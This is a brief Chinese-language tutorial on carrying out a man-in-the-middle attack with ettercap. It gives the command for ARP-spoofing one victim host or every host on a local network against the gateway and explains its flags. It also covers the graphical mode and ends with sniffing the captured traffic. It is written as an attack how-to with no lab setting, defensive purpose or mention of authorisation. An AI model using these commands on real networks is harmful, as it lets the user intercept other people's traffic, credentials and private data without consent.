中间人攻击之ettercap

1、查看网络接口状态选择自己将要欺骗的网段的一个接口。（这里我选择wlan0）

2、输入命令ettercap -Tqi wlan0 -M arp：remote  /欺骗主机的ip// /网关ip//

参数解释：

-T 文本模式

-q 安静模式 抓到数据包后不显示

-i 选择网络接口 （我选的wlan0）

-M 选择模式

注：（如果想欺骗局域网的所有主机可写成：ettercap -Tqi wlan0 -M arp：remote  /// /网关ip//）

3、当你嗅探到想要的数据后按下q退出ettercap。

4、如果不习惯用命令行界面就是用gui图形界面

使用root权限

命令为： ettercap -G

5、图形界面先选择网卡，后选择arp模块。

6、单击start开始嗅探。